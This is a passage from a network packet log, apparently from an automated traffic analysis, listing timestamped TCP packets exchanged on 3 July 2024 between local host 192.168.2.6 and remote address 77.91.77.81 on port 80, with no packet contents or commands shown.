                                                                Jul 3, 2024 08:38:25.122797012 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.122853994 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.122865915 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.122878075 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.122885942 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.122888088 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.122931957 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.122931957 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123110056 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123121977 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123133898 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123142958 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123143911 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123157978 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123168945 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123179913 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123192072 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123192072 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123192072 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123233080 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123233080 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123389959 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123554945 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123565912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123575926 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123586893 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123588085 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123588085 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123599052 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123610973 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123621941 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123635054 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123647928 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123647928 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.123938084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123950958 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123960972 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123970032 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123980999 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.123996973 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124008894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124017954 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124017954 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124392033 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124403954 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124414921 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124424934 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124429941 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124429941 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124437094 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124449015 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124459028 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124470949 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124490023 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124490023 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124490023 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124501944 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124514103 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124524117 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124533892 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124536037 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124536037 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124546051 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124557018 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124567986 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124578953 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124589920 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124589920 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124589920 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124602079 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.124631882 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.124631882 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125257015 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125268936 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125279903 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125291109 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125302076 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125303030 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125312090 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125324965 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125335932 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125344038 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125344038 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125355005 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125365973 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125375986 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125386000 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125386000 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125386953 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125399113 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125411034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125422001 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125432014 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125442028 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125444889 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125444889 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125453949 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.125483036 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.125483036 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.126244068 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126255989 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126266003 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126276970 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126292944 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126305103 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126321077 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126327991 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.126327991 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.126333952 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126347065 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.126380920 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.126380920 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.154694080 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.154735088 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.154747009 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.154763937 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.154798031 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.154812098 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.154841900 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.154841900 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.154892921 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.154906034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.154916048 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.154959917 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.154959917 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.155447006 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.155495882 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.155507088 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.155535936 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.155535936 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.155637980 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.155649900 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.155657053 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.155663013 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.155675888 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.155703068 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.155703068 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.156153917 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174319029 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174355030 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174365997 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174392939 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174392939 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174455881 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174467087 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174479008 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174482107 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174491882 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174515963 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174515963 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174609900 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174653053 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174664974 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174709082 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174709082 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174740076 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174751997 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174762964 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174773932 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174777985 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174784899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.174835920 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.174835920 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.212879896 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.212898970 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.212918043 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.212929964 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.212934971 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.212940931 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.212951899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.212961912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.212985992 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213036060 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213097095 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213108063 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213152885 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213154078 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213169098 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213191986 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213217020 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213289976 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213310003 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213321924 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213331938 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213342905 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213386059 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213484049 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213608027 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213640928 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213675976 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213689089 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213700056 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213711023 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213737965 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213737965 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213794947 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213809967 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213821888 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213835001 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213845015 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213855982 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213866949 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213877916 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.213885069 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.213885069 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214020014 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214040041 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214077950 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214099884 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214112043 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214123964 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214162111 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214162111 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214319944 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214332104 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214344025 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214354992 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214365005 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214376926 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214385033 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214385033 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214466095 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214555979 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214567900 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214586973 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214601994 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214606047 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214623928 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214709044 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214787960 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214807987 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214818954 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214832067 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214843988 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214881897 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214881897 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.214987040 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.214999914 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215008974 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215019941 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215032101 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215042114 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215044975 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215044975 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215090036 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215255976 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215267897 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215279102 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215291977 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215297937 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215302944 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215313911 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215327978 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215332031 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215341091 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215382099 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215432882 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215740919 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215753078 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215766907 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215778112 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215778112 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215790987 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215799093 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215802908 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215814114 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215825081 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215835094 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.215847969 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215847969 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.215935946 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216166019 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216185093 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216197014 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216204882 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216212034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216223001 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216223955 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216237068 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216238022 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216248989 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216259956 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216270924 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216280937 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216284990 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216284990 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216293097 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216299057 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216305971 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216317892 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216326952 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216337919 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216348886 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216352940 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216352940 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216394901 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216394901 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216830015 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216841936 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216851950 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216864109 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.216880083 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.216907978 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.245435953 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.245479107 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.245491982 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.245495081 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.245552063 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.245563984 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.245564938 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.245577097 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.245588064 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.245613098 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.245613098 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.245661974 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.245945930 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.245971918 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.246006012 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.246006012 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.246016979 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.246068954 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.246109962 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.246120930 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.246138096 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.246170998 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.246170998 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.246239901 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.246257067 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.246296883 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.246296883 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.264946938 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.264962912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.264974117 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265077114 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265094042 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265094995 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.265094995 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.265105963 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265120029 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265130997 CEST804971377.91.77.81192.168.2.6
